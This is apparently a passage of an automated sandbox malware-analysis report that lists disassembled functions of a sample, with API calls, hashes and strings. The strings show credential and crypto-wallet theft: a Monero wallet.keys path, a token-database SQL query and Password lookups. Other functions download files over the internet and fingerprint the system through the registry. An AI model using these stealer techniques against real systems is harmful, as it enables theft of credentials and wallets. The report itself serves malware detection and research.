                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                          • Instruction ID: def5ce88940f58f1aabf1e2d5e148ac5dc4e22ef087e0a7c9a22b7ec5d015e49
                          • Opcode Fuzzy Hash: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                          • Instruction Fuzzy Hash: 18613CB5A0426D9BDB24DB50CC51BDAB7B9BF88300F0081E9E649A6181DF745FC9CFA0
                          Function 009160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                          • InternetOpenA.WININET(00930DF7,00000001,00000000,00000000,00000000), ref: 0091610F
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00916147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0091618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009161B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 009161DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0091620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00916249
                          • InternetCloseHandle.WININET(?), ref: 00916253
                          • InternetCloseHandle.WININET(00000000), ref: 00916260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                          • Instruction ID: 6ba02c49d1d89c85062aaaba2107566fdccb0f2db0134fb47687623ee7416a2e
                          • Opcode Fuzzy Hash: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                          • Instruction Fuzzy Hash: 00513BB1A0021CABDB20DFA0DC59BEE77B8EB48705F108598E605A71C1DB746E89CF95
                          Function 0091BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0091BC9F
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0091BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0091BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0091BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                          • Instruction ID: 3c51e9cdb52a3b4134136bdb5b81dfcd13fdb927a7259aa7e987a337a20ff8b5
                          • Opcode Fuzzy Hash: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                          • Instruction Fuzzy Hash: CAB11F769101189BDB04FBA0ED96FEE733DAF94300F404568F506B7096EF346A49CBA6
                          Function 00926770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                          • Instruction ID: 3c78edfea26c59d734225bb960f3449e5e79bd03828ab1ced10eb525945afd0c
                          • Opcode Fuzzy Hash: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                          • Instruction Fuzzy Hash: FEF05830908399EFD344AFE0E909B2CBF74FB08703F0402D8E609A7690EA705F419B96
                          Function 00914FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00914FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00914FD1
                          • InternetOpenA.WININET(00930DDF,00000000,00000000,00000000,00000000), ref: 00914FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00915011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00915041
                          • InternetCloseHandle.WININET(?), ref: 009150B9
                          • InternetCloseHandle.WININET(?), ref: 009150C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                          • Instruction ID: c457839a0055d04b3e07c23f0b3590f04640912a1f8386b4d42d165e487f37ff
                          • Opcode Fuzzy Hash: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                          • Instruction Fuzzy Hash: 4A31E6B4A00218EBDB20CF94DC85BDDB7B4EB48705F5081D9EA09B7281DB746EC58F99
                          Function 00928100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0104FDC8,00000000,?,00930E2C,00000000,?,00000000), ref: 00928130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00928158
                          • wsprintfA.USER32 ref: 009281AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                          • Instruction ID: 3ce7f2e618f87c28c0a59267513e8a838ea814e13cadd934e54ebdc8ab6693ce
                          • Opcode Fuzzy Hash: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                          • Instruction Fuzzy Hash: FC21FCB1945218ABDB00DFD4DC49FAFB7B8FB44715F104609F605BB284DB7859018BA5
                          Function 009283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                          • wsprintfA.USER32 ref: 00928459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,01050038,00000000,000F003F,?,00000400), ref: 009284EC
                          • lstrlen.KERNEL32(?), ref: 00928501
                          • RegQueryValueExA.ADVAPI32(00000000,0104FFF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00930B34), ref: 00928599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                          • Instruction ID: 2bc31df3598b4c3253c38e3aec46fc34f3a3242664f43d265291cac188a6283e
                          • Opcode Fuzzy Hash: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                          • Instruction Fuzzy Hash: 7721F6B1910228ABDB24DB54DC85FE9B7B8FB48701F0086D8E609A6180DE716A85CF94
                          Function 00927690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009276A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009276AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D158,00000000,00020119,00000000), ref: 009276DD
                          • RegQueryValueExA.ADVAPI32(00000000,0104FFA8,00000000,00000000,?,000000FF), ref: 009276FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00927708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                          • Instruction ID: 295b56314a6c16f230fac185b47ee8f7867d1285545750b30fd361e040042740
                          • Opcode Fuzzy Hash: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                          • Instruction Fuzzy Hash: B5014FB5A04308BFDB00DBE4EC59F6DB7BCEB48702F104594FA04B7294EA7499048F51
                          Function 00927720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0092773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D158,00000000,00020119,009276B9), ref: 0092775B
                          • RegQueryValueExA.ADVAPI32(009276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0092777A
                          • RegCloseKey.ADVAPI32(009276B9), ref: 00927784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                          • Instruction ID: 64b37819ded1e9115482bbd54286d34381d3acfc3e876cb881c505ce9a7ed216
                          • Opcode Fuzzy Hash: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                          • Instruction Fuzzy Hash: 0601F4B5A40308BFD700DBE4DC49FAEB7B8EB48705F104695FA05B7281DA7059408F51
                          Function 009240B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 009240D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0104F8C0,00000000,00020119,?), ref: 009240F4
                          • RegQueryValueExA.ADVAPI32(?,01050230,00000000,00000000,00000000,000000FF), ref: 00924118
                          • RegCloseKey.ADVAPI32(?), ref: 00924122
                          • lstrcat.KERNEL32(?,00000000), ref: 00924147
                          • lstrcat.KERNEL32(?,010500E0), ref: 0092415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                          • Instruction ID: f6ad910a75ef1c272c20282cca9718f7b528261db83c42ee5a854704c2de1b8c
                          • Opcode Fuzzy Hash: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                          • Instruction Fuzzy Hash: 68418BB6D1020C6BDB14EBA0EC56FFE773DAB8C300F004598B71657185EE755B888B92
                          Function 009199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                          • LocalFree.KERNEL32(0091148F), ref: 00919A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
